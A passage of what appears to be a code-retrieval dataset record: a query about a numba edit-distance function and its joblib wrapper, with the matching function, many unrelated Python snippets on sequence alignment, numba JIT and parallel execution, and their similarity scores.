ress1.reverse()\r\n # concattar arrayerna till en sträng igen\r\n sum0 =''.join(ress0)\r\n sum1 =''.join(ress1)\r\n # stoppar in i resultatet\r\n result[0]=sum0\r\n result[1]=sum1\r\n\r\n return(result)", "def compute_local_alignment(seq_x,seq_y,scoring_matrix,alignment_matrix):\n best_score = 0\n len_m, len_n = len(seq_x), len(seq_y)\n best_i = 0\n best_j = 0\n x_ret, y_ret = '', ''\n for idx_i in range(len_m+1):\n for idx_j in range(len_n+1):\n if alignment_matrix[idx_i][idx_j] > best_score:\n best_score = alignment_matrix[idx_i][idx_j]\n best_i = idx_i\n best_j = idx_j\n idx_i = best_i\n idx_j = best_j\n while idx_i != 0 and idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n if alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j-1] +\n scoring_matrix[seq_x[idx_i-1]][seq_y[idx_j-1]]):\n # score from diagnoal cell\n x_ret = (seq_x[idx_i-1]) + x_ret\n y_ret = (seq_y[idx_j-1]) + y_ret\n idx_i -= 1\n idx_j -= 1\n elif alignment_matrix[idx_i][idx_j] == (alignment_matrix[idx_i-1][idx_j] +\n scoring_matrix[seq_x[idx_i-1]]['-']):\n # score from above cell\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n else:\n # score from left cell\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n while idx_i != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_j = 0, move upward along first column\n x_ret = (seq_x[idx_i - 1]) + x_ret\n y_ret = ('-') + y_ret\n idx_i -= 1\n while idx_j != 0:\n if alignment_matrix[idx_i][idx_j] == 0:\n return (best_score, x_ret, y_ret)\n\n # idx_i = 0, move left along first row\n x_ret = ('-') + x_ret\n y_ret = (seq_y[idx_j - 1]) + y_ret\n idx_j -= 1\n return (best_score, x_ret, y_ret)", "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances", "def pair_hmm_align_unaligned_seqs(seqs, moltype=DNA_cogent, params={}):\r\n\r\n seqs = LoadSeqs(data=seqs, moltype=moltype, aligned=False)\r\n try:\r\n s1, s2 = seqs.values()\r\n except ValueError:\r\n raise ValueError(\r\n \"Pairwise aligning of seqs requires exactly two seqs.\")\r\n\r\n try:\r\n gap_open = params['gap_open']\r\n except KeyError:\r\n gap_open = 5\r\n try:\r\n gap_extend = params['gap_extend']\r\n except KeyError:\r\n gap_extend = 2\r\n try:\r\n score_matrix = params['score_matrix']\r\n except KeyError:\r\n score_matrix = make_dna_scoring_dict(\r\n match=1, transition=-1, transversion=-1)\r\n\r\n return local_pairwise(s1, s2, score_matrix, gap_open, gap_extend)", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score" ]
[ "0.7585912", "0.65193325", "0.6018155", "0.5973261", "0.5960617", "0.5927266", "0.5902716", "0.5879615", "0.5879615", "0.5809641", "0.57759446", "0.5760104", "0.57229745", "0.5714925", "0.5702276", "0.5691489", "0.5681923", "0.5659949", "0.5631824", "0.56016165", "0.55863863", "0.558498", "0.55749315", "0.5506777", "0.54895747", "0.5479255", "0.5467247", "0.544265", "0.5356773", "0.5319879", "0.5309216", "0.5259449", "0.52525043", "0.5246517", "0.5223466", "0.5213233", "0.5211989", "0.52022827", "0.52016515", "0.5182729", "0.51753944", "0.5141377", "0.5139009", "0.5135867", "0.5133956", "0.51284134", "0.5103685", "0.50989443", "0.50973517", "0.5095779", "0.5081928", "0.50803125", "0.5065106", "0.50647897", "0.50488794", "0.50365704", "0.5035186", "0.5022366", "0.5016601", "0.5016086", "0.5015436", "0.5005177", "0.49978912", "0.4986173", "0.49556008", "0.49533147", "0.49445862", "0.4925716", "0.49223873", "0.49129793", "0.4894045", "0.4881723", "0.48802066", "0.4873834", "0.48678797", "0.48526466", "0.48401457", "0.48279247", "0.48153195", "0.48143938", "0.47867844", "0.47863838", "0.47752634", "0.477023", "0.47686982", "0.476483", "0.47610417", "0.47438693", "0.47421327", "0.4742066", "0.474166", "0.47412723", "0.47359058", "0.47282383", "0.4703133", "0.4701113", "0.46949562", "0.46876642", "0.46872383", "0.46846431" ]
0.7149528
1
This function works OK on its own. Wrapping it with the above python function was a workaround because joblib and multiprocessing seem to have an issue retaining default arguments with numba functions.
def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1): assert seqs_mat.shape[0] == seqs_L.shape[0] mx_L = nb.int_(np.max(seqs_L)) dist = np.zeros(indices.shape[0], dtype=np.int16) """As long as ldmat is big enough to accomodate the largest sequence its OK to only use part of it for the smaller sequences NOTE that to create a 2D array it must be created 1D and reshaped""" ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L)) for ind_i in nb.prange(indices.shape[0]): query_i = indices[ind_i, 0] seq_i = indices[ind_i, 1] q_L = seqs_L[query_i] s_L = seqs_L[seq_i] if q_L == s_L: """No gaps: substitution distance This will make it differ from a strict edit-distance since the optimal edit-distance may insert same number of gaps in both sequences""" #tmp_dist = 0 for i in range(q_L): dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]] #dist[ind_i] = tmp_dist continue """Do not need to re-zero each time""" # ldmat = np.zeros((q_L, s_L), dtype=np.int16) for row in range(1, q_L): ldmat[row, 0] = row * gap_penalty for col in range(1, s_L): ldmat[0, col] = col * gap_penalty for col in range(1, s_L): for row in range(1, q_L): ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty, ldmat[row, col-1] + gap_penalty, ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution dist[ind_i] = ldmat[row, col] return dist
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_default_args(self):\n cfunc = njit(g)\n self.assertEqual(cfunc(1, 2, 3), g(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), g(1, 2, 3))", "def __call__(self, *args, **kwargs):\n if Numba.numba_flag:\n return self.numba_fn(*args, **kwargs)\n else:\n return self.function(*args, **kwargs)", "def njit(func):\n return func", "def precompile_numba(self):\n\n t0 = time.time()\n\n # a. remember actual settings\n prev = dict()\n varnames = ['T','Nm','do_print','Nm_ret','Na_ret']\n for varname in varnames:\n prev[varname] = getattr(self.par,varname)\n\n # b. fast settings\n self.par.T = 2\n self.par.Nm_ret = 20\n self.par.Na_ret = 10\n self.par.Nm = 5\n self.par.do_print = False\n self.allocate()\n\n # c. solve\n self.solve()\n\n # d. reset\n for varname in varnames:\n setattr(self.par,varname,prev[varname]) \n\n self.allocate()\n\n if self.par.do_print:\n print(f'pre-compiled numba in {time.time()-t0:.2f} secs')", "def _make_one_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, args=()):\n return func(x, *args)\n\n return f, False", "def parallel_func(func, n_jobs, verbose=None, max_nbytes='auto'):\n # for a single job, we don't need joblib\n if n_jobs == 1:\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n try:\n from joblib import Parallel, delayed\n except ImportError:\n try:\n from sklearn.externals.joblib import Parallel, delayed\n except ImportError:\n warn('joblib not installed. Cannot run in parallel.')\n n_jobs = 1\n my_func = func\n parallel = list\n return parallel, my_func, n_jobs\n\n # check if joblib is recent enough to support memmaping\n p_args = _get_args(Parallel.__init__)\n joblib_mmap = ('temp_folder' in p_args and 'max_nbytes' in p_args)\n\n cache_dir = get_config('MNE_CACHE_DIR', None)\n if isinstance(max_nbytes, string_types) and max_nbytes == 'auto':\n max_nbytes = get_config('MNE_MEMMAP_MIN_SIZE', None)\n\n if max_nbytes is not None:\n if not joblib_mmap and cache_dir is not None:\n warn('\"MNE_CACHE_DIR\" is set but a newer version of joblib is '\n 'needed to use the memmapping pool.')\n if joblib_mmap and cache_dir is None:\n logger.info('joblib supports memapping pool but \"MNE_CACHE_DIR\" '\n 'is not set in MNE-Python config. To enable it, use, '\n 'e.g., mne.set_cache_dir(\\'/tmp/shm\\'). This will '\n 'store temporary files under /dev/shm and can result '\n 'in large memory savings.')\n\n # create keyword arguments for Parallel\n kwargs = {'verbose': 5 if logger.level <= logging.INFO else 0}\n\n if joblib_mmap:\n if cache_dir is None:\n max_nbytes = None # disable memmaping\n kwargs['temp_folder'] = cache_dir\n kwargs['max_nbytes'] = max_nbytes\n\n n_jobs = check_n_jobs(n_jobs)\n parallel = Parallel(n_jobs, **kwargs)\n my_func = delayed(func)\n return parallel, my_func, n_jobs", "def test_named_args(self):\n cfunc = njit(f)\n self.assertEqual(cfunc(1, 2, 3), f(1, 2, 3))\n self.assertEqual(cfunc(1, y=2, z=3), f(1, 2, 3))", "def _make_two_arg_numba_func(func, func_args):\n try:\n func_numba = numba.jit(func, nopython=True)\n\n @numba.jit(nopython=True)\n def f(x, args=()):\n return func_numba(x, *args)\n\n # Attempt function call\n _ = f(np.array([1.0, 2.0]), np.array([1.0, 2.0]), func_args)\n\n return f, True\n except:\n\n def f(x, y, args=()):\n return func(x, y, *args)\n\n return f, False", "def generate_numba_apply_func(\n func: Callable[..., Scalar],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_apply(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ) -> np.ndarray:\n result = np.empty(len(begin))\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window))\n if len(window) - count_nan >= minimum_periods:\n result[i] = numba_func(window, *args)\n else:\n result[i] = np.nan\n return result\n\n return roll_apply", "def IB(px,py,pyx_c,maxbeta=5,numbeta=30,iterations=100,restarts=3,parallel = False):\n pm_size = px.size\n bs = np.linspace(0.01,maxbeta,numbeta) #value of beta\n if parallel != False:\n pool = mp.Pool(processes=parallel)\n results = [pool.apply_async(beta_iter,args=(b,px,py,pyx_c,pm_size,restarts,iterations,)) for b in bs]\n pool.close()\n results = [p.get() for p in results]\n ips = [x[0] for x in results]\n ifs = [x[1] for x in results]\n #Values of beta may not be sorted appropriately, code below sorts ipast and ifuture according to their corresponding value of beta, and in correct order\n b_s = [x[2] for x in results] \n ips = [x for _, x in sorted(zip(b_s,ips))]\n ifs = [x for _, x in sorted(zip(b_s,ifs))]\n elif parallel == False:\n\t ips = np.zeros(bs.size)\n\t ifs = np.zeros(bs.size)\n\t for bi in range(bs.size):\n\t\t candidates = []\n\t\t for r in range(restarts):\n\t\t\t # initialize distribution for bottleneck variable\n\t\t\t pm = np.random.rand(pm_size)+1\n\t\t\t pm /= pm.sum()\n\t\t\t pym_c = np.random.rand(py.size,pm.size)+1 # Starting point for the algorithm\n\t\t\t pym_c /= pym_c.sum(axis=0)\n\t\t\t\t# iterate the BA algorithm\n\t\t\t for i in range(iterations):\n\t\t\t\t pmx_c, z = p_mx_c(pm,px,py,pyx_c,pym_c,bs[bi])\n\t\t\t\t pm = p_m(pmx_c,px)\n\t\t\t\t pym_c = p_ym_c(pm,px,py,pyx_c,pmx_c)\n\t\t\t\t if i>0 and np.allclose(pmx_c,pmx_c_old,rtol=1e-3,atol=1e-3):\n\t\t\t\t\t\t# if the x->m mapping is not updating any more, we're at convergence and we can stop\n\t\t\t\t\t break\n\t\t\t\t pmx_c_old = pmx_c\n\t\t\t candidates.append({'past_info' : mi_x1x2_c(pm, px, pmx_c),\n\t\t\t\t\t\t\t\t 'future_info' : mi_x1x2_c(py, pm, pym_c),\n\t\t\t\t\t\t\t\t 'functional' : -np.log2(np.inner(z,px))})\n\t\t\t# among the restarts, select the result that gives the minimum\n\t\t\t# value for the functional we're actually minimizing (eq 29 in\n\t\t\t# Tishby et al 2000).\n\t\t selected_candidate = min(candidates, key=lambda c: c['functional'])\n\t\t ips[bi] = selected_candidate['past_info']\n\t\t ifs[bi] = selected_candidate['future_info']\n # restrict the returned values to those that, at each value of\n # beta, actually increase (for Ipast) and do not decrease (for\n # Ifuture) the information with respect to the previous value of\n # beta. This is to avoid confounds from cases where the AB\n # algorithm gets stuck in a local minimum.\n ub, bs = compute_upper_bound(ips, ifs, bs)\n ips = np.squeeze(ub[:,0])\n ifs = np.squeeze(ub[:,1])\n return ips, ifs, bs", "def paramap(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=None, func_args=None, func_kwargs=None,\n **kwargs):\n\n func_args = func_args or []\n func_kwargs = func_kwargs or {}\n\n if engine == \"joblib\":\n if not has_joblib:\n raise joblib()\n if backend is None:\n backend = \"loky\"\n pp = joblib.Parallel(\n n_jobs=n_jobs, backend=backend,\n **kwargs)\n dd = joblib.delayed(func)\n d_l = [dd(ii, *func_args, **func_kwargs) for ii in in_list]\n results = pp(tqdm(d_l))\n\n elif engine == \"dask\":\n if not has_dask:\n raise dask()\n if backend is None:\n backend = \"threading\"\n\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n pp = partial(func, *func_args, **func_kwargs)\n dd = [dask.delayed(pp)(ii) for ii in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*dd, scheduler=\"processes\",\n workers=n_jobs, **kwargs)\n elif backend == \"threading\":\n results = dask.compute(*dd, scheduler=\"threads\",\n workers=n_jobs, **kwargs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n if engine == \"ray\":\n if not has_ray:\n raise ray()\n\n func = ray.remote(func)\n results = ray.get([func.remote(ii, *func_args, **func_kwargs)\n for ii in in_list])\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def __call__(self, *args, **kwargs):\n dprint(2, \"FunctionMetadata::__call__\", self.func.__name__, args, kwargs, self.numba_args)\n atypes = tuple([type(x) for x in args])\n try_again = True\n count = 0\n if not self.numba_pfunc:\n if len(self.numba_args) == 0 and not self.no_global_cache:\n self.numba_pfunc = get_fm(FillerFunc(self.func), True)\n self.numba_func = get_fm(FillerFunc(self.func), False)\n else:\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n\n if gpu_present:\n dprint(1, \"using gpu context\")\n\n with dpctl.device_context(\"level0:gpu\"):\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.ngfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.ngfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n except:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.npfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.npfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n except:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n\n if self.nfunc.get(atypes, True):\n try:\n ret = self.numba_func(*args, **kwargs)\n self.nfunc[atypes] = True\n dprint(3, \"Numba attempt succeeded.\")\n return ret\n except numba.core.errors.TypingError as te:\n print(\"Ramba TypingError:\", te, type(te))\n self.npfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n except:\n self.nfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n raise\n\n return self.func(*args, **kwargs)", "def jit(func):\n return func", "def conditional_jit(_func=None, **kwargs):\n if _func is None:\n return lambda fn: functools.wraps(fn)(maybe_numba_fn(fn, **kwargs))\n else:\n lazy_numba = maybe_numba_fn(_func, **kwargs)\n return functools.wraps(_func)(lazy_numba)", "def vectorize_par(\n f: Callable, inputs: Iterable,\n pool: Pool = None, processes=None, chunksize=1,\n nout=None, otypes: Union[Sequence[Type], Type] = None,\n use_starmap=True, meshgrid_input=True,\n) -> Tuple[Union[Mapping[Any, Any], np.ndarray, Sequence[Any]], ...]:\n if isinstance(inputs, dict):\n raise NotImplementedError()\n # s = dict(signature(f).parameters)\n # ks, ds = zip(*[(k, v.default) for k, v in s.items()])\n # inputs = [inputs[k] if k in inputs else arrayobj1d([d]) for k, d in zip(ks, ds)]\n\n if meshgrid_input:\n inputs = [\n inp if (isinstance(inp, np.ndarray) and type(inp[0]) is object)\n else (arrayobj1d(inp) if is_iter(inp)\n else arrayobj1d([inp]))\n for inp in inputs]\n shape0 = [len(inp) for inp in inputs]\n mesh_inputs = np.meshgrid(*inputs, indexing='ij') # type: Iterable[np.ndarray]\n else:\n inputs = [arrayobj1d([inp]) if not is_iter(inp) else inp for inp in inputs]\n shape0 = broadcast_shapes(*[npy(v).shape for v in inputs])\n mesh_inputs = [np.broadcast_to(v, shape0) for v in inputs]\n mesh_inputs = [m.flatten() for m in mesh_inputs]\n\n m = zip(*mesh_inputs)\n m = [m1 for m1 in m]\n\n if pool is None:\n pool = Pool(processes=processes) # type: PoolParallel\n\n # if processes == 0:\n # use_starmap = False\n\n if chunksize is None:\n # NOTE: this doesn't seem to work well, unlike chunksize=1.\n # Need further experiment.\n chunksize = np.max([\n int(np.floor(np.prod(shape0) / pool._processes)),\n 1\n ])\n\n if use_starmap:\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError from starmap! Trying again..')\n # Just try again - this seems to fix the issue\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError again after trying again.. '\n 'Not trying again this time.')\n raise\n else:\n outs = pool.map(f, m, chunksize=chunksize)\n\n if nout is None:\n if otypes is not None and is_sequence(otypes):\n nout = len(otypes)\n else:\n try:\n nout = len(outs[0])\n except TypeError:\n nout = 1\n\n if otypes is None:\n otypes = [object] * nout\n elif not is_sequence(type(otypes)):\n otypes = [otypes] * nout\n\n # NOTE: deliberately keeping outs, outs1, and outs2 for debugging.\n # After confirming everything works well, rename all to \"outs\"\n # to save memory.\n # DEF: outs1[argout][i_input_flattened]\n if nout > 1:\n outs1 = zip(*outs)\n else:\n if use_starmap:\n outs1 = [outs]\n else:\n # Reverse the action of map() putting each output in a list\n outs1 = [[out1[0] for out1 in outs]]\n\n # --- outs2: reshape to inputs' dimensions\n # DEF: outs2[argout][i_input1, i_input2, ...]\n outs2 = [arrayobj1d(out).reshape(shape0) for out in outs1]\n\n # --- outs3: set to a correct otype\n # DEF: outs3[argout][i_input1, i_input2, ...]\n outs3 = [cell2mat(out, otype) if otype not in [object, object]\n else out\n for out, otype in zip(outs2, otypes)]\n return tuple(outs3)", "def default_numba_nopython_pipeline(state, pm):\n if state.func_ir is None:\n pm.add_pass(TranslateByteCode, \"analyzing bytecode\")\n pm.add_pass(FixupArgs, \"fix up args\")\n pm.add_pass(IRProcessing, \"processing IR\")\n pm.add_pass(WithLifting, \"Handle with contexts\")\n\n # this pass adds required logic to overload default implementation of\n # Numpy functions\n pm.add_pass(DPPLAddNumpyOverloadPass, \"dppl add typing template for Numpy functions\")\n\n # Add pass to ensure when users are allocating static\n # constant memory the size is a constant and can not\n # come from a closure variable\n pm.add_pass(DPPLConstantSizeStaticLocalMemoryPass, \"dppl constant size for static local memory\")\n\n # pre typing\n if not state.flags.no_rewrites:\n pm.add_pass(RewriteSemanticConstants, \"rewrite semantic constants\")\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n pm.add_pass(GenericRewrites, \"nopython rewrites\")\n\n pm.add_pass(InlineClosureLikes,\n \"inline calls to locally defined closures\")\n # convert any remaining closures into functions\n pm.add_pass(MakeFunctionToJitFunction,\n \"convert make_function into JIT functions\")\n # inline functions that have been determined as inlinable and rerun\n # branch pruning, this needs to be run after closures are inlined as\n # the IR repr of a closure masks call sites if an inlinable is called\n # inside a closure\n pm.add_pass(InlineInlinables, \"inline inlinable functions\")\n if not state.flags.no_rewrites:\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n\n pm.add_pass(FindLiterallyCalls, \"find literally calls\")\n pm.add_pass(LiteralUnroll, \"handles literal_unroll\")\n\n if state.flags.enable_ssa:\n pm.add_pass(ReconstructSSA, \"ssa\")\n # typing\n pm.add_pass(NopythonTypeInference, \"nopython frontend\")\n pm.add_pass(AnnotateTypes, \"annotate types\")\n\n # strip phis\n pm.add_pass(PreLowerStripPhis, \"remove phis nodes\")\n\n # optimisation\n pm.add_pass(InlineOverloads, \"inline overloaded functions\")", "def __call__(self, par_dict: dict) -> np.ndarray:", "def vectorize(func, processes=1, on_complete=None):\n if processes > 1:\n return __multiprocess_wrapper(func, processes, on_complete)\n else:\n return single_process_wrapper(func, on_complete)", "def job_as_parameter(f):\n f.job_as_parameter = True\n return f", "def _seed_numba(seed):\n np.random.seed(seed)", "def Optimise(LogLikelihood,par,func_args,fixed=None,type='max',method='NM',maxiter=10000, maxfun=10000, verbose=True):\n \n if fixed==None:\n var_par = np.copy(par)\n #otherwise construct the parameter vector from var_par and fixed_par_val\n else:\n par = np.array(par)\n fixed = np.array(fixed) #ensure fixed is a np array\n #assign parameters to normal param vector\n fixed_par = par[np.where(fixed==True)]\n var_par = par[np.where(fixed!=True)]\n \n #set the algorithm to use - CG and P not working (at least not well)\n add_kwords = {'verbose':verbose}\n if method == 'NM':\n Algorithm = NelderMead\n add_kwords = {'maxiter':maxiter, 'maxfun':maxfun,'verbose':verbose}\n elif method == 'CG':\n print \"warning: CG method didn't work properly during testing\"\n Algorithm = ConjugateGradient\n elif method == 'P':\n print \"warning: Powell algorithm didn't work properly during testing\"\n Algorithm = Powell\n else:\n print \"error: optimisation function not found\"\n return par\n \n #set the optimisation function to pos or neg for the fmin funcitons\n if type == 'max': OptFunc = NegFixedPar_func\n elif type == 'min': OptFunc = FixedPar_func\n else:\n print \"error: %s not a valid option\" % type\n return par\n \n #call the optimser with the appropriate function\n fitted_par = Algorithm(OptFunc, var_par, (LogLikelihood,func_args,fixed,fixed_par), \\\n **add_kwords)\n \n #now return the params in the correct order...\n if fixed==None:\n return_par = fitted_par\n else:\n return_par = np.copy(par) \n return_par[np.where(fixed!=True)] = fitted_par\n \n return return_par", "def _run_job(args):\n # Note that we do not set the seed of the random number generator because\n # we already modified the interaction matrix before calling this function\n # and it does not harm us when all sub processes have the same sequence of\n # random numbers.\n \n # create the object ...\n obj = LibraryBinaryNumeric(**args[0])\n # ... get the method to evaluate ...\n method = getattr(obj, args[1])\n # ... and evaluate it\n if len(args) > 2:\n return method(**args[2])\n else:\n return method()", "def progress_wrapper(user_defined_function: Callable, master_workers_queue: multiprocessing.Queue, index: int, chunk_size: int) -> Callable:\n ...", "def generate_numba_table_func(\n func: Callable[..., np.ndarray],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_table(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ):\n result = np.empty((len(begin), values.shape[1]))\n min_periods_mask = np.empty(result.shape)\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window), axis=0)\n sub_result = numba_func(window, *args)\n nan_mask = len(window) - count_nan >= minimum_periods\n min_periods_mask[i, :] = nan_mask\n result[i, :] = sub_result\n result = np.where(min_periods_mask, result, np.nan)\n return result\n\n return roll_table", "def _dummy_jit(*args, **kwargs):\n\n def wrapper(f):\n return f\n\n def marker(*args, **kwargs):\n return marker\n\n if (\n len(args) > 0\n and (args[0] is marker or not callable(args[0]))\n or len(kwargs) > 0\n ):\n return wrapper\n elif len(args) == 0:\n return wrapper\n else:\n return args[0]", "def parfor(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=\"threading\", func_args=[], func_kwargs={}):\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n if engine == \"joblib\":\n p = joblib.Parallel(n_jobs=n_jobs, backend=backend)\n d = joblib.delayed(func)\n d_l = []\n for in_element in in_list:\n d_l.append(d(in_element, *func_args, **func_kwargs))\n results = p(d_l)\n\n elif engine == \"dask\":\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n p = partial(func, *func_args, **func_kwargs)\n d = [dask.delayed(p)(i) for i in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*d, get=dask.multiprocessing.get,\n workers=n_jobs)\n elif backend == \"threading\":\n results = dask.compute(*d, get=dask.threaded.get,\n workers=n_jobs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def default_helper_c_code_args():\r\n\r\n return {\r\n \"c_prefix\": \"PyArray\",\r\n \"strides_mul\": 1,\r\n }", "def test_workon_with_parallel_backend(self):\n\n def foo(x):\n return [dict(name=\"result\", type=\"objective\", value=x * 2)]\n\n import joblib\n\n with joblib.parallel_backend(\"loky\"):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=5, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 5\n\n with joblib.parallel_backend(\"loky\", n_jobs=-1):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=3, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 3", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to 